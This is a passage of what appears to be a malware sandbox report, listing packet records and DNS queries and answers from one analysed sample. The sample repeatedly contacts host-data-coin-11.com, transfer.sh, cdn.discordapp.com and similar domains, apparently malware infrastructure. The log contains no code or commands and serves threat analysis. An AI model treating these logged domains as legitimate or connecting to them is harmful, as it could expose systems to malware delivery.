                                                                                                        Jan 14, 2022 20:23:03.875988007 CET4976480192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.876041889 CET4976480192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.893177032 CET80497648.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.893199921 CET80497648.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.993900061 CET80497648.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:03.994010925 CET4976480192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:03.994245052 CET4976480192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:04.011424065 CET80497648.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:04.295306921 CET4976580192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:04.312762976 CET80497658.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:04.313122034 CET4976580192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:04.313250065 CET4976580192.168.2.38.209.70.0
                                                                                                        Jan 14, 2022 20:23:04.372956991 CET80497658.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:04.414849043 CET80497658.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:04.414912939 CET80497658.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:04.414952040 CET80497658.209.70.0192.168.2.3
                                                                                                        Jan 14, 2022 20:23:04.414990902 CET80497658.209.70.0192.168.2.3

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                        Jan 14, 2022 20:22:59.593086958 CET192.168.2.38.8.8.80xdb2aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:00.090055943 CET192.168.2.38.8.8.80xb64cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:00.553119898 CET192.168.2.38.8.8.80xd5c3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:00.720731974 CET192.168.2.38.8.8.80x5141Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:01.224791050 CET192.168.2.38.8.8.80xe843Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:01.448460102 CET192.168.2.38.8.8.80x2ea4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:03.074909925 CET192.168.2.38.8.8.80x97aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:03.562218904 CET192.168.2.38.8.8.80x3215Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:04.002065897 CET192.168.2.38.8.8.80x1642Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:05.775187969 CET192.168.2.38.8.8.80xc79cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:05.961374998 CET192.168.2.38.8.8.80xfb5aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:06.147183895 CET192.168.2.38.8.8.80x1527Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:06.739689112 CET192.168.2.38.8.8.80x5108Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:06.903386116 CET192.168.2.38.8.8.80xc95bStandard query (0)privacy-tools-for-you-780.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:08.851147890 CET192.168.2.38.8.8.80x908bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:09.027312994 CET192.168.2.38.8.8.80x2c44Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:09.206108093 CET192.168.2.38.8.8.80x7051Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:09.277249098 CET192.168.2.38.8.8.80xac5cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:09.484148026 CET192.168.2.38.8.8.80xe140Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:10.085179090 CET192.168.2.38.8.8.80x9e93Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:10.289695978 CET192.168.2.38.8.8.80xbfa0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:10.465589046 CET192.168.2.38.8.8.80xc084Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:13.875395060 CET192.168.2.38.8.8.80x4e00Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:14.052778006 CET192.168.2.38.8.8.80x5d57Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:14.231143951 CET192.168.2.38.8.8.80x2c7dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:14.428993940 CET192.168.2.38.8.8.80xda0eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.116410971 CET192.168.2.38.8.8.80xe276Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.282830954 CET192.168.2.38.8.8.80x1741Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.730241060 CET192.168.2.38.8.8.80x1230Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.898772955 CET192.168.2.38.8.8.80xdf88Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:19.761039019 CET192.168.2.38.8.8.80xfd1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:19.934057951 CET192.168.2.38.8.8.80x62c5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:20.122881889 CET192.168.2.38.8.8.80xb96fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:41.619885921 CET192.168.2.38.8.8.80x77dfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:41.816992044 CET192.168.2.38.8.8.80x2e1aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:41.993643999 CET192.168.2.38.8.8.80xc72fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.160722971 CET192.168.2.38.8.8.80x2d01Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.342725039 CET192.168.2.38.8.8.80xb2c1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.516983986 CET192.168.2.38.8.8.80x4563Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.683554888 CET192.168.2.38.8.8.80xff7aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.872464895 CET192.168.2.38.8.8.80xefc8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.068180084 CET192.168.2.38.8.8.80x8ed9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.260879040 CET192.168.2.38.8.8.80x12b6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.448460102 CET192.168.2.38.8.8.80xceeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.622994900 CET192.168.2.38.8.8.80x53c2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.790278912 CET192.168.2.38.8.8.80xb3a0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.991139889 CET192.168.2.38.8.8.80x20deStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:45.729631901 CET192.168.2.38.8.8.80x8df9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:45.928921938 CET192.168.2.38.8.8.80x4292Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:46.106477022 CET192.168.2.38.8.8.80x7729Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:46.783490896 CET192.168.2.38.8.8.80xcc15Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:46.994508028 CET192.168.2.38.8.8.80xd21dStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:47.961041927 CET192.168.2.38.8.8.80x59e0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:49.111679077 CET192.168.2.38.8.8.80xbdcfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:49.293678999 CET192.168.2.38.8.8.80x6782Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:49.463077068 CET192.168.2.38.8.8.80x55b3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:49.634524107 CET192.168.2.38.8.8.80x603dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:57.143260956 CET192.168.2.38.8.8.80x29eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:57.313873053 CET192.168.2.38.8.8.80x512aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:58.725483894 CET192.168.2.38.8.8.80xe13bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:58.901207924 CET192.168.2.38.8.8.80x1574Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:59.081888914 CET192.168.2.38.8.8.80x8015Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:59.302086115 CET192.168.2.38.8.8.80xbb59Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:01.871258974 CET192.168.2.38.8.8.80xf250Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:02.044727087 CET192.168.2.38.8.8.80x69ffStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:02.216252089 CET192.168.2.38.8.8.80xd2ddStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:03.665247917 CET192.168.2.38.8.8.80x50d1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:04.127317905 CET192.168.2.38.8.8.80xc30fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:04.312788963 CET192.168.2.38.8.8.80xe4e8Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:06.022989988 CET192.168.2.38.8.8.80x71d6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:06.312561035 CET192.168.2.38.8.8.80x4ae7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:14.684118032 CET192.168.2.38.8.8.80x4fd3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:14.937835932 CET192.168.2.38.8.8.80x8837Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:15.105503082 CET192.168.2.38.8.8.80x3864Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:17.843784094 CET192.168.2.38.8.8.80x91d5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.013364077 CET192.168.2.38.8.8.80x872fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.182811975 CET192.168.2.38.8.8.80xb763Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.355863094 CET192.168.2.38.8.8.80xb072Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.527890921 CET192.168.2.38.8.8.80x634aStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:21.727242947 CET192.168.2.38.8.8.80xb1d4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:21.889111042 CET192.168.2.38.8.8.80x293aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:22.071381092 CET192.168.2.38.8.8.80x6ba6Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:24.095540047 CET192.168.2.38.8.8.80xac86Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:25.046252012 CET192.168.2.38.8.8.80x2983Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:25.351382017 CET192.168.2.38.8.8.80xe2abStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:31.004300117 CET192.168.2.38.8.8.80xf809Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:36.338799953 CET192.168.2.38.8.8.80xe4e6Standard query (0)transfer.shA (IP address)IN (0x0001)

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                        Jan 14, 2022 20:22:59.911616087 CET8.8.8.8192.168.2.30xdb2aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:00.403337955 CET8.8.8.8192.168.2.30xb64cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:00.572498083 CET8.8.8.8192.168.2.30xd5c3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:01.048615932 CET8.8.8.8192.168.2.30x5141No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:01.244103909 CET8.8.8.8192.168.2.30xe843No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:01.748825073 CET8.8.8.8192.168.2.30x2ea4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:03.391123056 CET8.8.8.8192.168.2.30x97aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:03.856426954 CET8.8.8.8192.168.2.30x3215No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:04.293950081 CET8.8.8.8192.168.2.30x1642No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:05.792773008 CET8.8.8.8192.168.2.30xc79cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:05.980930090 CET8.8.8.8192.168.2.30xfb5aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:06.433780909 CET8.8.8.8192.168.2.30x1527No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:06.758944035 CET8.8.8.8192.168.2.30x5108No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:07.238167048 CET8.8.8.8192.168.2.30xc95bNo error (0)privacy-tools-for-you-780.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:08.870402098 CET8.8.8.8192.168.2.30x908bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:09.045989990 CET8.8.8.8192.168.2.30x2c44No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:09.228575945 CET8.8.8.8192.168.2.30x7051No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:09.296737909 CET8.8.8.8192.168.2.30xac5cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:09.503681898 CET8.8.8.8192.168.2.30xe140No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:10.105284929 CET8.8.8.8192.168.2.30x9e93No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:10.308665991 CET8.8.8.8192.168.2.30xbfa0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:10.785981894 CET8.8.8.8192.168.2.30xc084No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:13.894783020 CET8.8.8.8192.168.2.30x4e00No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:14.072632074 CET8.8.8.8192.168.2.30x5d57No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:14.249980927 CET8.8.8.8192.168.2.30x2c7dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:14.448292971 CET8.8.8.8192.168.2.30xda0eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.133790970 CET8.8.8.8192.168.2.30xe276No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.569967985 CET8.8.8.8192.168.2.30x1741No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.747776031 CET8.8.8.8192.168.2.30x1230No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.920452118 CET8.8.8.8192.168.2.30xdf88No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.920452118 CET8.8.8.8192.168.2.30xdf88No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.920452118 CET8.8.8.8192.168.2.30xdf88No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.920452118 CET8.8.8.8192.168.2.30xdf88No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:17.920452118 CET8.8.8.8192.168.2.30xdf88No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:19.778841972 CET8.8.8.8192.168.2.30xfd1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:19.951246977 CET8.8.8.8192.168.2.30x62c5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:20.142239094 CET8.8.8.8192.168.2.30xb96fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:41.639306068 CET8.8.8.8192.168.2.30x77dfNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:41.836302996 CET8.8.8.8192.168.2.30x2e1aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.013575077 CET8.8.8.8192.168.2.30xc72fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.180665016 CET8.8.8.8192.168.2.30x2d01No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.362310886 CET8.8.8.8192.168.2.30xb2c1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.536467075 CET8.8.8.8192.168.2.30x4563No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.703030109 CET8.8.8.8192.168.2.30xff7aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:42.891748905 CET8.8.8.8192.168.2.30xefc8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.085407019 CET8.8.8.8192.168.2.30x8ed9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.280286074 CET8.8.8.8192.168.2.30x12b6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.467264891 CET8.8.8.8192.168.2.30xceeNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.642393112 CET8.8.8.8192.168.2.30x53c2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:43.809518099 CET8.8.8.8192.168.2.30xb3a0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:44.295824051 CET8.8.8.8192.168.2.30x20deNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:45.748609066 CET8.8.8.8192.168.2.30x8df9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:45.948498964 CET8.8.8.8192.168.2.30x4292No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:46.127774000 CET8.8.8.8192.168.2.30x7729No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:46.127774000 CET8.8.8.8192.168.2.30x7729No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:46.803097963 CET8.8.8.8192.168.2.30xcc15No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:47.014014006 CET8.8.8.8192.168.2.30xd21dNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:47.980468988 CET8.8.8.8192.168.2.30x59e0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:49.133007050 CET8.8.8.8192.168.2.30xbdcfNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:49.313539028 CET8.8.8.8192.168.2.30x6782No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:49.482646942 CET8.8.8.8192.168.2.30x55b3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:49.654067993 CET8.8.8.8192.168.2.30x603dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:57.160844088 CET8.8.8.8192.168.2.30x29eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:57.332928896 CET8.8.8.8192.168.2.30x512aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:58.744246006 CET8.8.8.8192.168.2.30xe13bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:58.920618057 CET8.8.8.8192.168.2.30x1574No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:59.098858118 CET8.8.8.8192.168.2.30x8015No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:23:59.322348118 CET8.8.8.8192.168.2.30xbb59No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:01.890768051 CET8.8.8.8192.168.2.30xf250No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:02.064228058 CET8.8.8.8192.168.2.30x69ffNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:02.234983921 CET8.8.8.8192.168.2.30xd2ddNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:03.976593971 CET8.8.8.8192.168.2.30x50d1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:04.148250103 CET8.8.8.8192.168.2.30xc30fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:04.332371950 CET8.8.8.8192.168.2.30xe4e8No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:06.042289019 CET8.8.8.8192.168.2.30x71d6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:06.331660986 CET8.8.8.8192.168.2.30x4ae7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:14.704119921 CET8.8.8.8192.168.2.30x4fd3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:14.957201004 CET8.8.8.8192.168.2.30x8837No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:15.122947931 CET8.8.8.8192.168.2.30x3864No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:17.861490965 CET8.8.8.8192.168.2.30x91d5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.030811071 CET8.8.8.8192.168.2.30x872fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.202325106 CET8.8.8.8192.168.2.30xb763No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.373193026 CET8.8.8.8192.168.2.30xb072No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:18.547805071 CET8.8.8.8192.168.2.30x634aNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:21.744167089 CET8.8.8.8192.168.2.30xb1d4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:21.906145096 CET8.8.8.8192.168.2.30x293aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:22.090316057 CET8.8.8.8192.168.2.30x6ba6No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:24.114954948 CET8.8.8.8192.168.2.30xac86No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
